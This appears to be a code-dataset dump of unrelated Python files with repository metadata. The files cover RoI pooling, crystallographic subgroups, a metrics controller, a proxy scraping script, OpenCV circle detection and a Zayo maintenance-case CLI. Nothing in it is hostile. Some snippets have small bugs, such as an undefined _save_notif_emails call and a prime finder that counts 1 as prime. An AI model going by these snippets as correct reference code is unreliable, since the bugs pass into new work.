rois = torch.from_numpy(sample_roi).float()
roi_indices = 0 * np.ones((len(rois),), dtype=np.int32)
roi_indices = torch.from_numpy(roi_indices).float()
indices_and_rois = torch.cat([roi_indices[:, None], rois], dim=1)
xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
indices_and_rois = xy_indices_and_rois.contiguous()
size = (7, 7)
# get RoI maxpooling
output = []
rois = indices_and_rois.data.float()
rois[:, 1:].mul_(1/16.0) # Subsampling ratio
rois = rois.long()
num_rois = rois.size(0)
for i in range(num_rois):
roi = rois[i]
im_idx = roi[0]
im = out_map.narrow(0, im_idx, 1)[..., roi[2]:(roi[4]+1), roi[1]:(roi[3]+1)]
tmp = self.adaptive_max_pool(im)
output.append(tmp[0])
output = torch.cat(output, 0)
outputs = output.clone().detach()
# Reshape the tensor so that we can pass it through the feed forward layer.
# This is the output after pooling
out_maxPool = outputs.view(outputs.size(0), -1)
# run the detection network
k = self.roi_head_classifier(out_maxPool.to(device))
# It classifies the location and the score of the location
roi_cls_loc = self.cls_loc(k)
roi_cls_score = self.score(k)
return roi_cls_loc, roi_cls_score, rois
| 2,221 | 14 | 72 |
c31bb9d4e562c5d10b963674924d5c37a9969fc1 | 3,860 | py | Python | cctbx/examples/maximum_subgroups.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | cctbx/examples/maximum_subgroups.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | cctbx/examples/maximum_subgroups.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | """
Construct all subgroup graphs and their relations between them from a single space group.
"""
from __future__ import absolute_import, division, print_function
from cctbx import sgtbx
from cctbx.sgtbx import show_cosets
from cctbx.sgtbx import pointgroup_tools
from cctbx.development import debug_utils
import sys
if __name__=="__main__":
if len(sys.argv)>1:
run_single( sys.argv[1],True,True )
else:
run_all()
| 29.022556 | 159 | 0.639119 | """
Construct all subgroup graphs and their relations between them from a single space group.
"""
from __future__ import absolute_import, division, print_function
from cctbx import sgtbx
from cctbx.sgtbx import show_cosets
from cctbx.sgtbx import pointgroup_tools
from cctbx.development import debug_utils
import sys
def reverse_dict( dict ):
new_dict = {}
for item in dict:
for value in dict[item]:
if value is not None:
if value in new_dict:
tmp = new_dict[ value ]
tmp.append( item )
new_dict.update( {value:tmp} )
else:
new_dict.update( {value:[item]} )
return new_dict
def get_maximal_subgroup( sg_name, reverse_graph ):
subgroups = []
if sg_name in reverse_graph:
subgroups = reverse_graph[ sg_name ]
maximal = {}
for sg in subgroups:
maximal.update( {sg:True} )
result = []
for trial_sg in subgroups:
tmp = {}
if trial_sg in reverse_graph:
tmp = reverse_graph[ trial_sg ]
is_trial_sg_a_subgroup_of_items_in_subgroups=False
for item in tmp:
if item in subgroups:
maximal.update( {item:False} )
is_trial_sg_a_subgroup_of_subgroups=True
for item in maximal:
if maximal[item]:
result.append( item )
return result
def create_all_subgroups( sg1,show_all=True, reverse=False ):
sg_high = sgtbx.space_group_info( sg1 ).group()
sg_low = sgtbx.space_group_info( "p1" ).group()
graph_object = pointgroup_tools.point_group_graph( sg_low, sg_high, False,True)
highest_sg = str( sgtbx.space_group_info( sg1 ) )
rev_dict = reverse_dict( graph_object.graph.o )
maximal_subgroups = get_maximal_subgroup( highest_sg, rev_dict )
if show_all:
print("Subgroups of input space groups which can be constructed by introducing one single operator (and group completion) in the subgroup:")
for sg in rev_dict[ highest_sg ]:
line = " "
line += sg+(30-len(sg))*" "+str(graph_object.graph.edge_objects[ sg ][highest_sg])+(90-len( str(graph_object.graph.edge_objects[ sg ][highest_sg]) ))*" "
print(line)
print()
print("Maximal subgroup detected in the full sub-group-graph: ")
for sg in maximal_subgroups:
line = " "
line += sg
print(line)
print()
print()
print()
print(" Cosets for each maximal sub-group and the input space group are listed:")
for sg in maximal_subgroups:
print("-----------------------------------------------------------------")
show_cosets.run( sg,highest_sg )
print("-----------------------------------------------------------------")
print()
print()
print()
print()
else:
print("Maximal subgroups of %s: "%(sg1))
for sg in maximal_subgroups:
line = " "
line += sg
print(line)
print()
print()
print()
if reverse:
print("Minimal supergroups generated by the sub-groups of the input space group:")
tmp_sg = sgtbx.space_group_info( sg1 )
for sg in maximal_subgroups:
tmp_sgsg = sgtbx.space_group_info( sg )
cb_op = tmp_sgsg.change_of_basis_op_to_reference_setting()
okai=False
try:
new_sg = tmp_sg.change_basis( cb_op )
okai=True
print(new_sg ," is a minimal supergroup of ", tmp_sgsg.change_basis(cb_op))
except Exception: pass
if not okai:
print("%s (%s) is a minimal supergroup of %s [*]"%(tmp_sg,cb_op, tmp_sgsg.change_basis(cb_op)))
print()
print()
print()
def run_single(sg1, show=False, reverse=False):
create_all_subgroups( sg1, show, reverse )
def run_all():
sglist = debug_utils.get_test_space_group_symbols( False, False, True, False)
for sg in sglist:
run_single(sg)
if __name__=="__main__":
if len(sys.argv)>1:
run_single( sys.argv[1],True,True )
else:
run_all()
| 3,307 | 0 | 115 |
a335910a80aa2d1dd7265c8975aa9accc104494e | 1,497 | py | Python | src/metircs_controller.py | sbhorvatic/metrics | 5425a294cae3f1077fdf871a176c18c81a60f66c | [
"MIT"
] | null | null | null | src/metircs_controller.py | sbhorvatic/metrics | 5425a294cae3f1077fdf871a176c18c81a60f66c | [
"MIT"
] | null | null | null | src/metircs_controller.py | sbhorvatic/metrics | 5425a294cae3f1077fdf871a176c18c81a60f66c | [
"MIT"
] | null | null | null | import service_factory | 41.583333 | 104 | 0.739479 | import service_factory
class MetricsController:
def __init__(self, svc_factory, config):
self.service_factory = svc_factory
self.config = config
def route(self, http_response, route):
if route == buildRoute("metircs", self.config):
_get_metircs(self.service_factory.build(service_factory.ServiceType.METIRCS), http_response)
elif route == buildRoute("health", self.config):
_get_health(self.service_factory.build(service_factory.ServiceType.HEALTH), http_response)
else:
_404(self.service_factory.build(service_factory.ServiceType.NOT_FOUND), http_response)
def _get_metircs(service, http_response):
http_response.set_status_code(200)
http_response.set_content_type("application/json")
http_response.set_status_content(service.get_metircs_package())
def _get_health(service, http_response):
http_response.set_status_code(200)
http_response.set_content_type("application/json")
http_response.set_status_content(service.get_health_package())
def _404(service, http_response):
http_response.set_status_code(404)
http_response.set_content_type("text/plain")
http_response.set_status_content(service.get_404_package())
def buildRoute(route, config):
namespace = config.get_namespace()
service = config.get_service()
if namespace == None or namespace == "" or service == None or service == "":
return f"/{route}"
return f"/{namespace}/{service}/{route}" | 1,304 | 3 | 168 |
9563a427a32e6e758e49cc28d99803a1391285d3 | 771 | py | Python | src/turn_definitions_into_lists.py | yizhongw/natural-instructions | f4430d16168a5aafb3d05458c2d21c0ff3da258a | [
"Apache-2.0"
] | null | null | null | src/turn_definitions_into_lists.py | yizhongw/natural-instructions | f4430d16168a5aafb3d05458c2d21c0ff3da258a | [
"Apache-2.0"
] | null | null | null | src/turn_definitions_into_lists.py | yizhongw/natural-instructions | f4430d16168a5aafb3d05458c2d21c0ff3da258a | [
"Apache-2.0"
] | null | null | null | import json
import os
from os import listdir, path
from os.path import isfile, join
tasks_path = 'tasks/'
if __name__ == "__main__":
update_definitions(tasks_path)
| 30.84 | 93 | 0.57847 | import json
import os
from os import listdir, path
from os.path import isfile, join
tasks_path = 'tasks/'
def update_definitions(tasks_path):
files = [join(tasks_path, f) for f in listdir(tasks_path) if isfile(join(tasks_path, f))]
files.sort()
for file in files:
if file.endswith('.json'):
print(file)
with open(file) as f:
data = json.load(f)
definition = data['Definition']
if type(definition) == list:
continue
data['Definition'] = [definition]
with open(file, 'w') as o:
dump = json.dumps(data, indent = 4, ensure_ascii=False)
o.write(dump)
if __name__ == "__main__":
update_definitions(tasks_path)
| 579 | 0 | 22 |
2926d3868b170bf1ba0ad2e82deaf83a8c9c3225 | 281 | py | Python | sklearn_export/estimator/scaler/Scaler.py | zwelz3/sklearn-export | 6692d94f8a592e8f3c9f21d672d8aa814e4d1473 | [
"MIT"
] | 4 | 2019-03-02T14:18:36.000Z | 2021-11-09T08:10:32.000Z | sklearn_export/estimator/scaler/Scaler.py | zwelz3/sklearn-export | 6692d94f8a592e8f3c9f21d672d8aa814e4d1473 | [
"MIT"
] | 3 | 2019-05-03T03:54:36.000Z | 2022-02-14T03:57:24.000Z | sklearn_export/estimator/scaler/Scaler.py | zwelz3/sklearn-export | 6692d94f8a592e8f3c9f21d672d8aa814e4d1473 | [
"MIT"
] | 1 | 2022-02-21T00:46:29.000Z | 2022-02-21T00:46:29.000Z | # -*- coding: utf-8 -*-
from sklearn_export.Template import Template
| 23.416667 | 57 | 0.669039 | # -*- coding: utf-8 -*-
from sklearn_export.Template import Template
class Scaler(Template):
def __init__(self, estimator, **kwargs):
# pylint: disable=unused-argument
super(Scaler, self).__init__(estimator, **kwargs)
self.estimator_type = 'scaler'
| 158 | 2 | 50 |
c5d5dc0bb745afa2ef1f37a5aa65c490fd7217c8 | 1,825 | py | Python | taxamo/models/settlement_daily_stats_schema.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | taxamo/models/settlement_daily_stats_schema.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | taxamo/models/settlement_daily_stats_schema.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright 2014-2015 Taxamo, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Settlement_daily_stats_schema:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
| 32.589286 | 80 | 0.609315 | #!/usr/bin/env python
"""
Copyright 2014-2015 Taxamo, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Settlement_daily_stats_schema:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'b2c': 'integer',
'untaxed': 'integer',
'eu_taxed': 'integer',
'eu_b2b': 'integer',
'count': 'integer',
'eu_total': 'integer',
'day_raw': 'str',
'b2b': 'integer',
'day': 'str'
}
#B2C transaction count.
self.b2c = None # integer
#Untaxed transaction count.
self.untaxed = None # integer
#Total EU Taxed transaction count.
self.eu_taxed = None # integer
#Total EU B2B transaction count.
self.eu_b2b = None # integer
#Total transaction count.
self.count = None # integer
#Total EU transaction count.
self.eu_total = None # integer
#Date for stats in yyyy-MM-dd'T'hh:mm:ss'Z' format.
self.day_raw = None # str
#B2B transaction count.
self.b2b = None # integer
#Date for stats in yyyy-MM-dd format.
self.day = None # str
| 1,007 | 0 | 27 |
991fef1f4303fe203a73f3df4e34225e6fa1dab8 | 464 | py | Python | bs4/webscraping26.py | dirleif/aprendendo-scraping | 0850897c019402c897e9ec58160a13aec2e02665 | [
"MIT"
] | null | null | null | bs4/webscraping26.py | dirleif/aprendendo-scraping | 0850897c019402c897e9ec58160a13aec2e02665 | [
"MIT"
] | null | null | null | bs4/webscraping26.py | dirleif/aprendendo-scraping | 0850897c019402c897e9ec58160a13aec2e02665 | [
"MIT"
] | null | null | null | """
usando Requests
trabalhando com proxies
"""
# importando modulo Requests
import requests
# proxies free
# http://www.ultrapoxies.com/
# https://www.hide-my-ip.com/pt/proxylist.shtml
url = 'https://www.hide-my-ip.com/pt/proxylist.shtml'
#proxies = {'https':'169.57.157.148:8123'}
proxies = {'http':'183.181.164.210:80'}
try:
r = requests.get(url, proxies=proxies)
print(r.status_code)
except requests.exceptions.ConnectionError as e:
print(str(e) | 23.2 | 53 | 0.711207 | """
usando Requests
trabalhando com proxies
"""
# importando modulo Requests
import requests
# proxies free
# http://www.ultrapoxies.com/
# https://www.hide-my-ip.com/pt/proxylist.shtml
url = 'https://www.hide-my-ip.com/pt/proxylist.shtml'
#proxies = {'https':'169.57.157.148:8123'}
proxies = {'http':'183.181.164.210:80'}
try:
r = requests.get(url, proxies=proxies)
print(r.status_code)
except requests.exceptions.ConnectionError as e:
print(str(e) | 0 | 0 | 0 |
c8c10fe048a9868e987858ea2383b73353afe56e | 20 | py | Python | appstoreconnect/__init__.py | chenchaozhongvip/appstoreconnectapi | 57ba5598f0eb7356181432c755533ec3c757172c | [
"MIT"
] | 1 | 2021-04-28T06:43:41.000Z | 2021-04-28T06:43:41.000Z | appstoreconnect/__init__.py | chenchaozhongvip/appstoreconnectapi | 57ba5598f0eb7356181432c755533ec3c757172c | [
"MIT"
] | null | null | null | appstoreconnect/__init__.py | chenchaozhongvip/appstoreconnectapi | 57ba5598f0eb7356181432c755533ec3c757172c | [
"MIT"
] | 1 | 2020-11-15T00:05:31.000Z | 2020-11-15T00:05:31.000Z | from .api import Api | 20 | 20 | 0.8 | from .api import Api | 0 | 0 | 0 |
15f3ebe7c1100c0232e282b832684959311ce8c6 | 185 | py | Python | ml-core/serializers.py | exactpro/nostradamus | 80df847a012374ad2b702cc9f9c9cb46c1153ee7 | [
"Apache-2.0"
] | 25 | 2019-12-18T05:32:41.000Z | 2022-03-23T12:16:49.000Z | ml-core/serializers.py | Exactpro/nostradamus | 80df847a012374ad2b702cc9f9c9cb46c1153ee7 | [
"Apache-2.0"
] | 12 | 2018-12-24T14:56:50.000Z | 2019-11-29T16:53:49.000Z | ml-core/serializers.py | exactpro/nostradamus | 80df847a012374ad2b702cc9f9c9cb46c1153ee7 | [
"Apache-2.0"
] | 7 | 2019-12-18T05:32:43.000Z | 2021-08-18T05:27:04.000Z | from pydantic import BaseModel, Extra
| 15.416667 | 37 | 0.637838 | from pydantic import BaseModel, Extra
class UserSerializer(BaseModel):
id: int
email: str
name: str
class Config:
orm_mode = True
extra = Extra.allow
| 0 | 123 | 23 |
9db9efe8ddc2a5122785c3852ab6fdde4c29dac3 | 2,226 | py | Python | well_plate_project/data_etl/backup_test/circle_detection_test1.py | MthBr/well-plate-light-driven-predictions | d313c5ff8f589516cb6f65f422626faed5bf6dd2 | [
"MIT"
] | null | null | null | well_plate_project/data_etl/backup_test/circle_detection_test1.py | MthBr/well-plate-light-driven-predictions | d313c5ff8f589516cb6f65f422626faed5bf6dd2 | [
"MIT"
] | null | null | null | well_plate_project/data_etl/backup_test/circle_detection_test1.py | MthBr/well-plate-light-driven-predictions | d313c5ff8f589516cb6f65f422626faed5bf6dd2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 12:52:01 2020
Circle Detection inspiration:
https://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv
@author: modal
"""
#%% INIT
image_file_name = 'a2_a_cropped.jpg'
from well_plate_project.config import data_dir
path = data_dir / 'raw'
image_file = path / image_file_name
assert image_file.is_file()
import cv2
import numpy as np
from skimage.feature import peak_local_max
from skimage.segmentation import watershed
from scipy import ndimage
import matplotlib.pyplot as plt
# Load in image, convert to gray scale, and Otsu's threshold
image = cv2.imread(str(image_file))
plt.imshow(image)
plt.show()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
# Remove small noise by filtering using contour area
cnts = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
for c in cnts:
if cv2.contourArea(c) < 1000:
cv2.drawContours(thresh,[c], 0, (0,0,0), -1)
#cv2.imshow('thresh', thresh)
plt.imshow(cv2.cvtColor(thresh, cv2.COLOR_BGR2RGB)); plt.show()
# Compute Euclidean distance from every binary pixel
# to the nearest zero pixel then find peaks
distance_map = ndimage.distance_transform_edt(thresh)
local_max = peak_local_max(distance_map, indices=False, min_distance=5, labels=thresh)
# Perform connected component analysis then apply Watershed
markers = ndimage.label(local_max, structure=np.ones((3, 3)))[0]
labels = watershed(-distance_map, markers, mask=thresh)
# Iterate through unique labels
for label in np.unique(labels):
if label == 0:
continue
# Create a mask
mask = np.zeros(gray.shape, dtype="uint8")
mask[labels == label] = 255
# Find contours and determine contour area
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
c = max(cnts, key=cv2.contourArea)
cv2.drawContours(image, [c], -1, (36,255,12), -1)
#cv2.imshow('image', image)
plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
plt.show()
#cv2.waitKey() | 29.289474 | 96 | 0.734951 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 12:52:01 2020
Circle Detection inspiration:
https://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv
@author: modal
"""
#%% INIT
image_file_name = 'a2_a_cropped.jpg'
from well_plate_project.config import data_dir
path = data_dir / 'raw'
image_file = path / image_file_name
assert image_file.is_file()
import cv2
import numpy as np
from skimage.feature import peak_local_max
from skimage.segmentation import watershed
from scipy import ndimage
import matplotlib.pyplot as plt
# Load in image, convert to gray scale, and Otsu's threshold
image = cv2.imread(str(image_file))
plt.imshow(image)
plt.show()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
# Remove small noise by filtering using contour area
cnts = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
for c in cnts:
if cv2.contourArea(c) < 1000:
cv2.drawContours(thresh,[c], 0, (0,0,0), -1)
#cv2.imshow('thresh', thresh)
plt.imshow(cv2.cvtColor(thresh, cv2.COLOR_BGR2RGB)); plt.show()
# Compute Euclidean distance from every binary pixel
# to the nearest zero pixel then find peaks
distance_map = ndimage.distance_transform_edt(thresh)
local_max = peak_local_max(distance_map, indices=False, min_distance=5, labels=thresh)
# Perform connected component analysis then apply Watershed
markers = ndimage.label(local_max, structure=np.ones((3, 3)))[0]
labels = watershed(-distance_map, markers, mask=thresh)
# Iterate through unique labels
for label in np.unique(labels):
if label == 0:
continue
# Create a mask
mask = np.zeros(gray.shape, dtype="uint8")
mask[labels == label] = 255
# Find contours and determine contour area
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
c = max(cnts, key=cv2.contourArea)
cv2.drawContours(image, [c], -1, (36,255,12), -1)
#cv2.imshow('image', image)
plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
plt.show()
#cv2.waitKey() | 0 | 0 | 0 |
3ff82c5368207c58022b160e3ec4b8cc0c639d88 | 797 | py | Python | roomai/games/texasholdem/__init__.py | tonyxxq/RoomAI | 5f28e31e659dd7808127c3c3cc386e6892a93982 | [
"MIT"
] | 1 | 2018-11-29T01:57:18.000Z | 2018-11-29T01:57:18.000Z | roomai/games/texasholdem/__init__.py | tonyxxq/RoomAI | 5f28e31e659dd7808127c3c3cc386e6892a93982 | [
"MIT"
] | null | null | null | roomai/games/texasholdem/__init__.py | tonyxxq/RoomAI | 5f28e31e659dd7808127c3c3cc386e6892a93982 | [
"MIT"
] | null | null | null | #!/bin/python
from roomai.games.texasholdem.TexasHoldemUtil import PokerCard
from roomai.games.texasholdem.TexasHoldemUtil import AllCardsPattern
from roomai.games.texasholdem.TexasHoldemUtil import AllPokerCards
from roomai.games.texasholdem.TexasHoldemUtil import Stage
from roomai.games.texasholdem.TexasHoldemActionChance import TexasHoldemActionChance
from roomai.games.texasholdem.TexasHoldemAction import TexasHoldemAction
from roomai.games.texasholdem.TexasHoldemStatePerson import TexasHoldemStatePerson
from roomai.games.texasholdem.TexasHoldemStatePrivate import TexasHoldemStatePrivate
from roomai.games.texasholdem.TexasHoldemStatePublic import TexasHoldemStatePublic
from roomai.games.texasholdem.TexasHoldemEnv import TexasHoldemEnv
| 66.416667 | 84 | 0.844417 | #!/bin/python
from roomai.games.texasholdem.TexasHoldemUtil import PokerCard
from roomai.games.texasholdem.TexasHoldemUtil import AllCardsPattern
from roomai.games.texasholdem.TexasHoldemUtil import AllPokerCards
from roomai.games.texasholdem.TexasHoldemUtil import Stage
from roomai.games.texasholdem.TexasHoldemActionChance import TexasHoldemActionChance
from roomai.games.texasholdem.TexasHoldemAction import TexasHoldemAction
from roomai.games.texasholdem.TexasHoldemStatePerson import TexasHoldemStatePerson
from roomai.games.texasholdem.TexasHoldemStatePrivate import TexasHoldemStatePrivate
from roomai.games.texasholdem.TexasHoldemStatePublic import TexasHoldemStatePublic
from roomai.games.texasholdem.TexasHoldemEnv import TexasHoldemEnv
| 0 | 0 | 0 |
75cb2322f9d26771a35d036696a241bea5cf6af4 | 237 | py | Python | FindPrimeNumbers.py | KrishnaR7626/MiscProjects | b9ddfd515db282f8ace8663a2995b96f4462fbe1 | [
"MIT"
] | null | null | null | FindPrimeNumbers.py | KrishnaR7626/MiscProjects | b9ddfd515db282f8ace8663a2995b96f4462fbe1 | [
"MIT"
] | null | null | null | FindPrimeNumbers.py | KrishnaR7626/MiscProjects | b9ddfd515db282f8ace8663a2995b96f4462fbe1 | [
"MIT"
] | null | null | null | # An inefficient way I could think of to find prime numbers.
i = int(input("enter max "))
t=1
while t<i:
m=1
c=0
while m<i:
if t%m==0:
c+=1
m+=1
if c<=2:
print(t)
t+=1
| 16.928571 | 61 | 0.443038 | # An inefficient way I could think of to find prime numbers.
i = int(input("enter max "))
t=1
while t<i:
m=1
c=0
while m<i:
if t%m==0:
c+=1
m+=1
if c<=2:
print(t)
t+=1
| 0 | 0 | 0 |
f24dc5a428b45036fe3c62ee34bb12fabbe4b11e | 9,705 | py | Python | pyzayo/cli/cli_cases.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
] | 1 | 2021-06-02T10:00:35.000Z | 2021-06-02T10:00:35.000Z | pyzayo/cli/cli_cases.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
] | null | null | null | pyzayo/cli/cli_cases.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
] | null | null | null | """
This file contains the CLI code for the maintenance commands.
References
----------
For the Rich package, colors are defined here:
https://rich.readthedocs.io/en/latest/appendix/colors.html#appendix-colors
"""
# -----------------------------------------------------------------------------
# System Imports
# -----------------------------------------------------------------------------
from typing import List, Dict
from operator import attrgetter
# -----------------------------------------------------------------------------
# Public Imports
# -----------------------------------------------------------------------------
import click
from rich.console import Console
from rich.table import Table, Text
# from rich.console import TerminalTheme
import maya
# -----------------------------------------------------------------------------
# Private Imports
# -----------------------------------------------------------------------------
from pyzayo import ZayoClient
from .cli_root import cli
from pyzayo import consts
from pyzayo.mtc_models import CaseRecord, ImpactRecord, NotificationDetailRecord
from pyzayo.consts import CaseStatusOptions
# -----------------------------------------------------------------------------
#
# TABLE CODE BEGINS
#
# -----------------------------------------------------------------------------
def colorize_urgency(urgency: str):
""" set the text style for case.urgency field """
style = {
consts.CaseUrgencyOptions.emergency: "bold red",
consts.CaseUrgencyOptions.demand: "bright_blue",
consts.CaseUrgencyOptions.planned: "bright_yellow",
}.get(
consts.CaseUrgencyOptions(urgency) # noqa
) # noqa
return Text(urgency, style=style)
def colorize_status(status):
""" set the text style for case.status field"""
return Text(
status,
style={CaseStatusOptions.scheduled: "bright_yellow"}.get(
consts.CaseStatusOptions(status) # noqa
),
)
def colorize_impact(impact):
""" set the text style for case.impact field """
style = {
consts.CaseImpactOptions.potential_svc_aff: "",
consts.CaseImpactOptions.svc_aff: "bold red",
}.get(
consts.CaseImpactOptions(impact) # noqa
) # noqa
return Text("\n".join(impact.split()), style=style)
def make_cases_table(recs: List[CaseRecord]) -> Table:
"""
This function creates the Rich.Table that contains the cases information.
Parameters
----------
recs: List[CaseRecord]
The list of case records in model-object form.
Returns
-------
The rendered Table of case information.
"""
n_cases = len(recs)
table = Table(
title=Text(
f"Cases ({n_cases})" if n_cases > 1 else "Case",
style="bright_white",
justify="left",
),
show_header=True,
header_style="bold magenta",
show_lines=True,
)
table.add_column("Case #")
table.add_column("Urgency")
table.add_column("Status")
table.add_column("Impact")
table.add_column("Date(s)")
table.add_column("Location", width=12, overflow="fold")
table.add_column("Start Time")
table.add_column("End Time")
table.add_column("Reason")
pdates = attrgetter("primary_date", "primary_date_2", "primary_date_3")
for row_obj in recs:
if row_obj.status != consts.CaseStatusOptions.closed:
row_obj.urgency = colorize_urgency(row_obj.urgency) # noqa
row_obj.impact = colorize_impact(row_obj.impact)
row_obj.status = colorize_status(row_obj.status)
rec_pdates = sorted(pd for pd in pdates(row_obj) if pd)
md = maya.parse(rec_pdates[0])
dstr = "\n".join(map(str, rec_pdates)) + f"\n({md.slang_time()})"
table.add_row(
row_obj.case_num,
row_obj.urgency,
row_obj.status,
row_obj.impact,
dstr,
row_obj.location,
str(row_obj.from_time),
str(row_obj.to_time),
row_obj.reason,
)
return table
def make_impacts_table(impacts: List[dict]) -> Table:
"""
This function creates the Rich.Table that contains the case impact information.
Parameters
----------
impacts: List[dict]
The list of case impact records in API dict form.
Returns
-------
The rendered Table of case impact information.
"""
count = len(impacts)
table = Table(
title=Text(
f"Impacts ({count})" if count > 1 else "Impact",
style="bright_white",
justify="left",
),
show_header=True,
header_style="bold magenta",
show_lines=True,
)
table.add_column("Case #")
table.add_column("Circuit Id")
table.add_column("Expected Impact")
table.add_column("CLLI A")
table.add_column("CLLI Z")
for rec in impacts:
row_obj = ImpactRecord.parse_obj(rec)
table.add_row(
row_obj.case_num,
row_obj.circuit_id,
row_obj.impact,
row_obj.clli_a,
row_obj.clli_z,
)
return table
def make_notifs_table(notifs):
"""
This function creates the Rich.Table that contains the case notification information.
Parameters
----------
notifs: List[dict]
The list of case impact records in API dict form.
Returns
-------
The rendered Table of case notifications information.
"""
count = len(notifs)
table = Table(
title=Text(
f"Notifications ({count})" if count > 1 else "Notification",
style="bright_white",
justify="left",
),
show_header=True,
header_style="bold magenta",
show_lines=True,
)
table.add_column("#")
table.add_column("Type")
table.add_column("Email Sent")
table.add_column("Email Subject")
table.add_column("Email To")
for rec in notifs:
row_obj = NotificationDetailRecord.parse_obj(rec)
email_list = sorted(map(str.strip, row_obj.email_list.split(";")))
mt = maya.parse(row_obj.date)
dstring = (
mt.local_datetime().strftime("%Y-%m-%d\n%H:%M:%S")
+ f"\n({mt.slang_time()})"
)
table.add_row(
row_obj.name, row_obj.type, dstring, row_obj.subject, "\n".join(email_list)
)
return table
# HTML_SAVE_THEME = TerminalTheme(
# (0, 0, 0),
# (199, 199, 199),
# [(0, 0, 0),
# (201, 27, 0),
# (0, 194, 0),
# (199, 196, 0),
# (2, 37, 199),
# (202, 48, 199),
# (0, 197, 199),
# (199, 199, 199),
# (104, 104, 104)],
# [(255, 110, 103),
# (95, 250, 104),
# (255, 252, 103),
# (104, 113, 255),
# (255, 119, 255),
# (96, 253, 255),
# (255, 255, 255)]
# )
# -----------------------------------------------------------------------------
#
# CLI CODE BEGINS
#
# -----------------------------------------------------------------------------
@cli.group("cases")
def mtc():
"""
Maintenance commands.
"""
pass
@mtc.command(name="list")
@click.option("--circuit-id", help="filter case by circuit ID")
def mtc_cases(circuit_id):
"""
Show listing of maintenance caess.
"""
zapi = ZayoClient()
recs = [
rec
for rec in map(
CaseRecord.parse_obj,
zapi.get_cases(orderBy=[consts.OrderBy.date_sooner.value]),
)
if rec.status != CaseStatusOptions.closed
]
# if circuit_id was provided by the User then we need to filter the case
# list by only those records that have an associated impact record with the
# same circuit_id value.
if circuit_id:
circuit_id = zapi.format_circuit_id(circuit_id)
impacted_case_nums = [
i_rec["caseNumber"]
for rec in recs
for i_rec in zapi.get_impacts(by_case_num=rec.case_num)
if i_rec["circuitId"] == circuit_id
]
recs = [rec for rec in recs if rec.case_num in impacted_case_nums]
console = Console(record=True)
console.print(make_cases_table(recs))
# console.save_html('cases.html', theme=HTML_SAVE_THEME)
@mtc.command(name="show-details")
@click.argument("case_number")
@click.option("--save-emails", "-E", is_flag=True, help="Save notification emails")
def mtc_case_details(case_number, save_emails):
"""
Show specific case details.
"""
# find the case by number
zapi = ZayoClient()
case, impacts, notifs = zapi.get_case_details(by_case_num=case_number)
console = Console()
if not case:
console.print(f"Case [bold white]{case_number}: [bold red]Not found")
return
console.print(f"\nCase [bold white]{case_number}[/bold white]: [bold green]Found")
console.print("\n", make_cases_table([CaseRecord.parse_obj(case)]), "\n")
console.print(make_impacts_table(impacts), "\n")
console.print(make_notifs_table(notifs), "\n")
if save_emails:
_save_notif_emails(notifs)
